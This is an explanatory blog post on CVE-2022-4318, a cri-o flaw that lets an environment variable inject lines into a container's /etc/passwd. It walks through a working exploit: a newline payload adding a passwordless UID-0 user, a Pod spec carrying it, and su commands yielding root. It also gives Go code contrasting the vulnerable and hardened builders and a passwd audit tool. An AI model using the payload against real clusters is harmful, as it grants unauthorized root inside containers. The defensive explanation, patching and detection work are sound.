In late 2022, a serious vulnerability was discovered in cri-o, the container runtime that Kubernetes and other systems depend on to run OCI containers. Tracked as CVE-2022-4318, the issue let an attacker who can set a container's environment variables inject arbitrary lines into that container's /etc/passwd. That makes privilege escalation inside the container, and potentially escape from it, much easier. Let's break down how the vulnerability works, why it's dangerous, and walk through an exploit in simple terms.

What Is cri-o?

cri-o is a lightweight container runtime for Kubernetes. It sits between the Kubernetes kubelet and an OCI-compatible low-level runtime such as runc. Because cri-o prepares each container before it starts, it writes files into the container's root filesystem (including /etc/passwd) and passes through the environment variables the workload asked for.

How Was cri-o Vulnerable?

The problem was that, when creating a container, cri-o could write the value of an environment variable into /etc/passwd inside the container without checking its contents. /etc/passwd is a line-oriented file, one record per line, so an attacker who could set environment variables for a container only had to include a newline character: everything after it was written as a brand-new record.

Why /etc/passwd?

This is the file that stores user account information on Linux: one record per line, with the fields name:password:UID:GID:comment:home:shell. Privilege on Linux is decided by the numeric UID, not the name, so an injected record with UID 0 is a root account inside the container no matter what it is called.

Exploit Walkthrough

1. Craft the Malicious Environment Variable

ATTACKER_ENVAR="badvalue\nattackeruser::0:0:root:/root:/bin/bash"

Here, \n ends the field cri-o was writing and starts a new line, so everything after it is parsed as a second passwd record. UID 0 and GID 0 make that account root, and the empty password field means su will not ask for a password on systems whose PAM configuration permits empty passwords (the common nullok setting).

2. Launch a Container Via cri-o

The attacker uses any path that reaches cri-o (a Kubernetes Pod spec, or direct access to the CRI socket on a node) to create a container with the malicious environment variable.

3. Injected /etc/passwd Entry

Once the container starts, the unvalidated value is written into /etc/passwd, and the text after \n becomes a new root-equivalent user.

Suppose you can submit a Pod spec to a Kubernetes cluster whose nodes run an unpatched cri-o:

apiVersion: v1
kind: Pod
metadata:
  name: exploit-pod
spec:
  containers:
  - name: exploiter
    image: ubuntu:20.04
    env:
    - name: MALICIOUS
      value: "badvalue\nattackeruser::0:0:root:/root:/bin/bash"
    command: ["sleep", "99999"]

(In a double-quoted YAML scalar, \n is a real newline, which is exactly what the payload needs.)

If cri-o mishandles the environment variable, /etc/passwd inside the container may then contain

root:x:0:0:root:/root:/bin/bash
...
attackeruser::0:0:root:/root:/bin/bash

The attacker can now switch to attackeruser, whose UID is 0. Two practical caveats: this only buys anything when the container was running as a non-root user to begin with (if it already runs as root there is nothing to escalate), and su must be present and setuid in the image, as it is in stock ubuntu:20.04.

4. Abusing the Privilege

kubectl exec -it exploit-pod -- bash
su attackeruser
id   # uid=0: a root shell inside the container
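The following Go program is an added example, not cri-o's own code, that models the bug class behind the walkthrough above: a passwd record is assembled from container settings and one field comes straight from an attacker-controlled environment variable. It assumes the home-directory field is the one that received the raw value (the page does not name the variable cri-o copied), shows the vulnerable builder beside a hardened one that rejects field separators, and uses a constructed payload. Note the payload deliberately omits the final shell field: the builder appends ":/bin/sh" itself, so the injected record comes out well formed.

```go
package main

import (
	"errors"
	"fmt"
	"strings"
)

// Added example, not cri-o's code. Assumption: the home field is where the
// attacker-controlled environment variable lands.

var errBadField = errors.New("passwd field contains a forbidden character")

// passwdEntryVulnerable builds a passwd record without validating its fields.
// A newline inside home turns one record into two.
func passwdEntryVulnerable(name string, uid, gid int, home, shell string) string {
	return fmt.Sprintf("%s:x:%d:%d:%s:%s:%s\n", name, uid, gid, name, home, shell)
}

// passwdEntry is the hardened form: any character that can break the
// one-record-per-line, colon-separated format (newline, carriage return,
// colon, NUL) is refused instead of being written.
func passwdEntry(name string, uid, gid int, home, shell string) (string, error) {
	if uid < 0 || gid < 0 {
		return "", errors.New("uid and gid must be non-negative")
	}
	for _, f := range []string{name, home, shell} {
		if strings.ContainsAny(f, "\n\r:\x00") {
			return "", fmt.Errorf("%w: %q", errBadField, f)
		}
	}
	return fmt.Sprintf("%s:x:%d:%d:%s:%s:%s\n", name, uid, gid, name, home, shell), nil
}

// countEntries counts non-empty lines, i.e. passwd records, in a blob.
func countEntries(passwd string) int {
	n := 0
	for _, line := range strings.Split(passwd, "\n") {
		if line != "" {
			n++
		}
	}
	return n
}

func main() {
	// Constructed payload: everything after the newline becomes a second
	// record; the trailing shell field is supplied by the builder.
	const evilHome = "/home/app\nattackeruser::0:0:root:/root"

	v := passwdEntryVulnerable("app", 1000, 1000, evilHome, "/bin/sh")
	fmt.Printf("vulnerable builder wrote %d records:\n%s", countEntries(v), v)

	if _, err := passwdEntry("app", 1000, 1000, evilHome, "/bin/sh"); err != nil {
		fmt.Println("hardened builder refused:", err)
	}
}
```

The fix is a whitelist on the fields, not an attempt to escape the newline: there is no escaping syntax in /etc/passwd, so the only safe response to a separator character in a field is to reject the value.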

Why Is This A Big Deal?

* Privilege escalation: Attackers can become root inside a container even when the workload was deliberately configured to run as a non-root user.
* Potential container escape: Combined with a kernel or runtime bug that requires root in the container, attackers might break out to the host.
* Data exfiltration: Root inside the container can read every file, secret mount and environment variable of every process in that container.

Responsible Disclosure and Patching

- The cri-o team was informed responsibly and released patched versions that validate environment-variable values before writing them into /etc/passwd. Upgrade cri-o on every node; the fix lives in the runtime, so nothing in the Pod spec can work around it.

References

- NIST National Vulnerability Database: CVE-2022-4318
- cri-o GitHub Security Advisory for CVE-2022-4318
- Container Security 101

Mitigations

- Restrict who can set environment variables in workloads. In Kubernetes, anyone allowed to create or edit Pods (or the Deployments, Jobs and similar objects that produce them) in a namespace can set them, so treat that RBAC permission as node-level sensitive.
- Audit container images and running pods for suspicious users in /etc/passwd: more than one UID-0 account, empty password fields, duplicated usernames, or lines that do not have the seven colon-separated fields.
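As an added example of the audit suggested above (not part of the original post or of cri-o), the Go program below parses a /etc/passwd blob and reports the records an injected line would typically produce. The sample passwd content is constructed; in practice you would feed it the output of `kubectl exec <pod> -- cat /etc/passwd` by passing that output as a file argument.

```go
package main

import (
	"bufio"
	"fmt"
	"os"
	"strconv"
	"strings"
)

// Added example, not cri-o's code.

// Finding is one suspicious passwd record.
type Finding struct {
	Line   int
	Reason string
	Record string
}

// auditPasswd flags a second UID-0 account, an empty password field, a
// duplicated username, a non-numeric UID, and any line that does not have
// the seven colon-separated fields of a passwd record.
func auditPasswd(content string) []Finding {
	var findings []Finding
	seen := map[string]int{} // username -> first line it appeared on
	sc := bufio.NewScanner(strings.NewReader(content))
	for n := 1; sc.Scan(); n++ {
		line := sc.Text()
		if line == "" {
			continue
		}
		f := strings.Split(line, ":")
		if len(f) != 7 {
			findings = append(findings, Finding{n, fmt.Sprintf("%d fields, expected 7", len(f)), line})
			continue
		}
		name, pw, uidStr := f[0], f[1], f[2]
		if first, dup := seen[name]; dup {
			findings = append(findings, Finding{n, fmt.Sprintf("duplicate user %q (first seen on line %d)", name, first), line})
		} else {
			seen[name] = n
		}
		uid, err := strconv.Atoi(uidStr)
		if err != nil {
			findings = append(findings, Finding{n, "non-numeric uid", line})
			continue
		}
		if uid == 0 && name != "root" {
			findings = append(findings, Finding{n, "uid 0 account other than root", line})
		}
		if pw == "" {
			findings = append(findings, Finding{n, "empty password field", line})
		}
	}
	return findings
}

// Constructed sample: a normal passwd prefix followed by the kind of record
// the CVE-2022-4318 payload produces, a truncated line, and a duplicate name.
const sample = "root:x:0:0:root:/root:/bin/bash\n" +
	"app:x:1000:1000::/home/app:/bin/sh\n" +
	"attackeruser::0:0:root:/root:/bin/bash\n" +
	"broken:x:1:1\n" +
	"app:x:1001:1001::/home/app2:/bin/sh\n"

func main() {
	content := sample
	if len(os.Args) > 1 { // e.g. go run audit.go passwd-from-pod.txt
		data, err := os.ReadFile(os.Args[1])
		if err != nil {
			fmt.Fprintln(os.Stderr, err)
			os.Exit(1)
		}
		content = string(data)
	}
	for _, f := range auditPasswd(content) {
		fmt.Printf("line %d: %s: %s\n", f.Line, f.Reason, f.Record)
	}
}
```

Run it across the images in a registry as well as live pods: an injected record that made it into a committed image survives every restart, while one written by cri-o at container creation disappears when the pod is recreated on a patched node.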

Summary

CVE-2022-4318 is a sobering reminder that even a small sanitization mistake in a core container platform like cri-o can have large, real-world consequences. By allowing arbitrary line injection into /etc/passwd, it let attackers who could set an environment variable grab root inside a container and threaten the cluster around it. Patch promptly, review who can create workloads in your cluster, and stay up to date: the security of your containers depends on it.

Timeline

Published on: 09/25/2023 20:15:00 UTC
Last modified on: 09/26/2023 20:51:00 UTC